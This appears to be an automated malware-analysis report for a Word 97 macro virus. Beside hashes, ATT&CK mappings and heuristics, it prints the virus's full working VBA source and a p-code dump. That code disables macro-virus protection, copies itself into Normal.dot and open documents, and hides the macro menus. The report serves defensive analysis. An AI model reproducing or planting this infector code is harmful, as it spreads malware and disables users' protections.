W97M — Office (OLE) malware analysis

Static analysis result for SHA-256 030064818331d9b8…

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-06-15 05:52:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-22
MD5: 44266a22135ec61aa9b3873f6badf890 SHA-1: d4eb2ce10eacec3134b4d02117e8d54bd2f456ad SHA-256: 030064818331d9b85ad91950a93e55adc63cf163cf9b48d51a51f55a6283b572
168 Risk Score

Malware Insights

W97M · confidence 90%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1137.001 Office Application Startup: Office Template Macros (the AutoOpen module is copied into Normal.dot with Application.OrganizerCopy) · T1562.001 Impair Defenses: Disable or Modify Tools (Options.VirusProtection = False; Tools › Macro menu items and the Visual Basic toolbar are disabled). Tags carried over from the automated mapper but not supported by the extracted macro: T1547.001 Registry Run Keys / Startup Folder (the script performs no registry or startup-folder writes — persistence is via the global template) and T1566.001 Spearphishing Attachment (a delivery assumption; the sample is a document infector and contains no evidence of how it was delivered).

The sample is identified as a W97M variant — a Word 97 document macro virus. The extracted module is named AutoOpen and its Sub MAIN runs when the document is opened. It (1) sets Options.VirusProtection = False, switching off Word 97's macro-virus warning for every document opened afterwards; (2) copies the AutoOpen module into the global template Normal.dot via Application.OrganizerCopy (persistence across Word sessions) and, in the other direction, from Normal.dot into whatever document is active (propagation); (3) reschedules itself with Application.OnTime for the next ten-minute boundary, so further documents touched during the session are infected; and (4) greys out the Tools › Macro menu items (matched by captions that decode as GBK Chinese, so this part only works on a Chinese-localised Word) and the "Visual Basic" toolbar to hinder inspection. No downloader, dropper, network, file-drop or registry activity is present in the extracted code; apart from replication, the only user-visible effect is an empty system-modal message box titled "CPSDI" at the top of each hour. Clean-up therefore means removing the AutoOpen module from Normal.dot and from infected documents and re-enabling macro virus protection — persistence is template-based, not Run-key based.

Heuristics 5

  • ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-13
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro — matched on the module name, not on a procedure: the auto-executing procedure is Sub MAIN inside a module named AutoOpen (the form Word produces when converting a WordBasic AutoOpen macro); there is no Sub AutoOpen in the project.
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. Note: this rule's stock description asserts that no modern VBA project was recovered and no stronger macro-virus family marker was present, which contradicts the other findings on this page (a VBA project with the Macros/VBA/AutoOpen stream was extracted, and OLE_VBA_MACRO_VIRUS_REPLICATION fired). Treat it as a redundant, lower-confidence indicator of the same auto-exec surface rather than independent evidence. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11052 bytes
SHA-256: 06aefc9e7b5dcc22a8fb067028e7e5cc7c8d04a341f41fee7a8c887735bbd075
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Option Explicit

' Entry point of the infector. The module is named "AutoOpen" (Attribute
' VB_Name above) and this Sub is called MAIN, which is the form Word produces
' when converting a WordBasic AutoOpen macro; Word runs it when the document
' is opened. On each run it:
'   1. resolves the path of the current document and of Normal.dot,
'   2. switches off Word's macro-virus protection prompt,
'   3. copies the AutoOpen module into Normal.dot if it is not already there,
'   4. copies it from Normal.dot into the active document if missing,
'   5. reschedules itself with Application.OnTime and hides the macro UI.
' Nothing in this code downloads, drops files, touches the registry or the
' network; beyond replication the only visible effect is the message box below.
Public Sub MAIN()

Dim MyFile$        ' path of the document being infected (name only if unsaved)
Dim OkExist        ' 1 when an "AutoOpen" module already exists in the target project
Dim TemplateName$  ' full path of Normal.dot
Dim internal       ' "00:<m>" string fed to TimeValue for the reschedule
Dim xItem          ' VBComponent iterator
Dim t              ' current time as "hhmmss"
Dim s              ' never assigned, so the MsgBox below has an empty body

' Set up an error trap: every failure below (VBE object-model access refused,
' OrganizerCopy failing, a bad TimeValue string) is silently ignored, so the
' routine never surfaces an error to the user.
On Error Resume Next

' Get the active document's file name, path-qualified when it has been saved.
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

If MyFile$ = "" Then GoTo Bye

' "Show date/time information on the hour": Mid(t, 3, 2) is the minutes field
' of "hhmmss", so this fires when minutes == 00, and is suppressed for dates
' before September 1998. Because s is never set, what actually appears is an
' empty, system-modal message box titled "CPSDI". The commented-out line kept
' verbatim below was the original reminder; its string literals are GBK
' Chinese rendered as mojibake ("day", "hour", title "my reminder").
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ"
End If


' Check whether the global template (Normal.dot) already has an "AutoOpen"
' module, walking its VBA project through the VBE object model. Type = 1 is
' presumably the standard-module component type.
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' Get the global template's file name.
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

' Clear any read-only/hidden attributes on Normal.dot so it can be written,
' then switch off Word's macro-virus protection (the "document contains
' macros" prompt) for every document opened afterwards. These two lines are
' the AV-tampering behaviour matched by OLE_VBA_MACRO_VIRUS_REPLICATION.
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' Copy the AutoOpen module from this document into Normal.dot: persistence,
' since every later Word session loads the infected global template.
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' Check whether the active document already has an "AutoOpen" module.
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' Copy the AutoOpen module from Normal.dot into the active document:
' propagation, as the document now carries the infector to the next machine.
' When MAIN runs from an already-infected document this branch is skipped.
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' Schedule the AutoOpen macro to run again. Mid(t, 4, 1) is the units digit
' of the minutes field, so "internal" is 1..10 minutes and the target is the
' next ten-minute boundary (the current seconds, Right(t, 2), are subtracted).
' Str() prefixes a space ("00: 7"); whether TimeValue tolerates that cannot be
' verified from here, and any failure is swallowed by On Error Resume Next.
' Re-running MAIN infects whatever document is active at that moment, which
' makes this timer the in-session spreading mechanism. OnTime entries do not
' outlive the Word process; cross-session persistence is Normal.dot above.
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
' Hide the evidence: grey out Tools > Macro and the Visual Basic toolbar.
DisableMacroMenu
DisableVBTools
End Sub
' Grey out every command under Tools > Macro on the main menu bar so the user
' cannot reach the Macros dialog or the VB editor from the menu. The captions
' compared are GBK-encoded Chinese rendered here as mojibake (they decode to
' "Tools(&T)" and "Macro(&M)"), so this only takes effect on a Chinese-localised
' Word; on other locales nothing matches and nothing is disabled. Errors, if
' any, are swallowed by the caller's On Error Resume Next.
Public Sub DisableMacroMenu()
'Disable the Macro command group on the Tools menu.
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "¹¤¾ß(&T)" Then
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "ºê(&M)" Then
            ' Original commented-out line kept verbatim: the Macro submenu
            ' itself stays enabled; only its child commands are disabled,
            ' which is less conspicuous than a greyed-out menu entry.
            'xxItem.Enabled = True
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
' Disable the "Visual Basic" toolbar so the macro/VB-editor buttons cannot be
' reached from the toolbar. Unlike DisableMacroMenu this matches the English
' toolbar name, so it is not locale-dependent.
Public Sub DisableVBTools()
'Make the Visual Basic toolbar unusable.
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub



' Processing file: /opt/analyzer/scan_staging/20de1762c7234ee2bc1897fc42b88c8a.bin  (analyzer-internal staging copy; this path is an artifact of the sandbox run, not a property of the sample)
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5792 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	QuoteRem 0x0000 0x000C "ÉèÖôíÎóÏÝÚå"
' Line #13:
' 	OnError (Resume Next) 
' Line #14:
' Line #15:
' 	QuoteRem 0x0000 0x000E "»ñÈ¡»î¶¯ÎļþÃû"
' Line #16:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	St MyFile$ 
' Line #18:
' 	ElseBlock 
' Line #19:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Add 
' 	St MyFile$ 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld MyFile$ 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Bye 
' 	EndIf 
' Line #23:
' Line #24:
' 	QuoteRem 0x0000 0x0014 "Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢"
' Line #25:
' 	Ld Time 
' 	LitStr 0x0006 "hhmmss"
' 	ArgsLd Format$ 0x0002 
' 	St t 
' Line #26:
' 	Ld t 
' 	LitDI2 0x0003 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	LitStr 0x0002 "00"
' 	Eq 
' 	Ld Date 
' 	LitStr 0x0004 "yyyy"
' 	ArgsLd Format$ 0x0002 
' 	LitStr 0x0004 "1998"
' 	Eq 
' 	Ld Date 
' 	LitStr 0x0002 "mm"
' 	ArgsLd Format$ 0x0002 
' 	ArgsLd Val 0x0001 
' 	LitDI2 0x0009 
' 	Lt 
' 	And 
' 	Paren 
' 	Not 
' 	And 
' 	IfBlock 
' Line #27:
' 	Ld s 
' 	Ld vbSystemModal 
' 	LitStr 0x0005 "CPSDI"
' 	ArgsCall MsgBox 0x0003 
' Line #28:
' 	QuoteRem 0x0002 0x0066 "MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ""
' Line #29:
' 	EndIfBlock 
' Line #30:
' Line #31:
' Line #32:
' 	QuoteRem 0x0000 0x0021 " ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #33:
' 	LitDI2 0x0000 
' 	St OkExist 
' Line #34:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #35:
' 	Ld xItem 
' 	MemLd TypeOf 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld xItem 
' 	MemLd New 
' 	LitStr 0x0008 "AutoOpen"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #36:
' 	LitDI2 0x0001 
' 	St OkExist 
' Line #37:
' 	ExitFor 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x0015 " »ñȡͨÓÃÄ£°åµÄÎļþÃû"
' Line #42:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld NormalTemplate 
' 	MemLd New 
' 	Add 
' 	St TemplateName$ 
' Line #43:
' Line #44:
' 	QuoteRem 0x0000 0x0030 "ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ"
' Line #45:
' 	Ld TemplateName$ 
' 	Ld vbNormal 
' 	ArgsCall SetAttr 0x0002 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' Line #48:
' 	QuoteRem 0x0000 0x0019 " ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å"
' Line #49:
' 	Ld OkExist 
' 	LitDI2 0x0001 
' 	Ne 
' 	IfBlock 
' Line #50:
' 	Ld MyFile$ 
' 	ParamNamed Source 
' 	Ld TemplateName$ 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #51:
' 	EndIfBlock 
' Line #52:
' Line #53:
' 	QuoteRem 0x0000 0x0021 " ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #54:
' 	LitDI2 0x0000 
' 	St OkExist 
' Line #55:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #56:
' 	Ld xItem 
' 	MemLd TypeOf 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld xItem 
' 	MemLd New 
' 	LitStr 0x0008 "AutoOpen"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #57:
' 	LitDI2 0x0001 
' 	St OkExist 
' Line #58:
' 	ExitFor 
' Line #59:
' 	EndIfBlock 
' Line #60:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #61:
' Line #62:
' 	QuoteRem 0x0000 0x0018 "¿½±´AutoOpenºêµ½»î¶¯Îĵµ"
' Line #63:
' 	Ld OkExist 
' 	LitDI2 0x0001 
' 	Ne 
' 	IfBlock 
' Line #64:
' 	Ld TemplateName$ 
' 	ParamNamed Source 
' 	Ld MyFile$ 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #65:
' 	EndIfBlock 
' Line #66:
' Line #67:
' 	Label Bye 
' Line #68:
' Line #69:
' 	QuoteRem 0x0000 0x001F " ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷"
' Line #70:
' 	LitStr 0x0003 "00:"
' 	LitDI2 0x000A 
' 	Ld t 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Val 0x0001 
' 	Sub 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St internal 
' Line #71:
' 	Ld Now 
' 	Ld internal 
' 	ArgsLd TimeValue 0x0001 
' 	Add 
' 	LitStr 0x0006 "00:00:"
' 	Ld t 
' 	LitDI2 0x0002 
' 	ArgsLd Right 0x0002 
' 	Add 
' 	ArgsLd TimeValue 0x0001 
' 	Sub 
' 	ParamNamed When 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	LitDI2 0x003C 
' 	ParamNamed Tolerance 
' 	Ld Application 
' 	ArgsMemCall OnTime 0x0003 
' Line #72:
' 	ArgsCall DisableMacroMenu 0x0000 
' Line #73:
' 	ArgsCall DisableVBTools 0x0000 
' Line #74:
' 	EndSub 
' Line #75:
' 	FuncDefn (Public Sub DisableMacroMenu())
' Line #76:
' 	QuoteRem 0x0000 0x001E "ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ"
' Line #77:
' 	Dim 
' 	VarDefn cb
' 	VarDefn xItem
' 	VarDefn xxItem
' 	VarDefn xxxItem
' Line #78:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd CommandBars 
' 	ForEach 
' Line #79:
' 	Ld cb 
' 	MemLd New 
' 	LitStr 0x0008 "Menu Bar"
' 	Eq 
' 	IfBlock 
' Line #80:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld cb 
' 	MemLd Controls 
' 	ForEach 
' Line #81:
' 	Ld xItem 
' 	MemLd Caption 
' 	LitStr 0x0008 "¹¤¾ß(&T)"
' 	Eq 
' 	IfBlock 
' Line #82:
' 	StartForVariable 
' 	Ld xxItem 
' 	EndForVariable 
' 	Ld xItem 
' 	MemLd Controls 
' 	ForEach 
' Line #83:
' 	Ld xxItem 
' 	MemLd Caption 
' 	LitStr 0x0006 "ºê(&M)"
' 	Eq 
' 	IfBlock 
' Line #84:
' 	QuoteRem 0x000C 0x0015 "xxItem.Enabled = True"
' Line #85:
' 	StartForVariable 
' 	Ld xxxItem 
' 	EndForVariable 
' 	Ld xxItem 
' 	MemLd Controls 
' 	ForEach 
' Line #86:
' 	LitVarSpecial (False)
' 	Ld xxxItem 
' 	MemSt Enabled 
' Line #87:
' 	StartForVariable 
' 	Ld xxxItem 
' 	EndForVariable 
' 	NextVar 
' Line #88:
' 	ExitSub 
' Line #89:
' 	EndIfBlock 
' Line #90:
' 	StartForVariable 
' 	Ld xxItem 
' 	EndForVariable 
' 	NextVar 
' Line #91:
' 	EndIfBlock 
' Line #92:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #93:
' 	EndIfBlock 
' Line #94:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	NextVar 
' Line #95:
' 	EndSub 
' Line #96:
' 	FuncDefn (Public Sub DisableVBTools())
' Line #97:
' 	QuoteRem 0x0000 0x0020 "ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ"
' Line #98:
' 	Dim 
' 	VarDefn cb
' Line #99:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd CommandBars 
' 	ForEach 
' Line #100:
' 	Ld cb 
' 	MemLd New 
' 	LitStr 0x000C "Visual Basic"
' 	Eq 
' 	IfBlock 
' Line #101:
' 	LitVarSpecial (False)
' 	Ld cb 
' 	MemSt Enabled 
' Line #102:
' 	ExitFor 
' Line #103:
' 	EndIfBlock 
' Line #104:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	NextVar 
' Line #105:
' 	EndSub 
' Line #106:
' Line #107: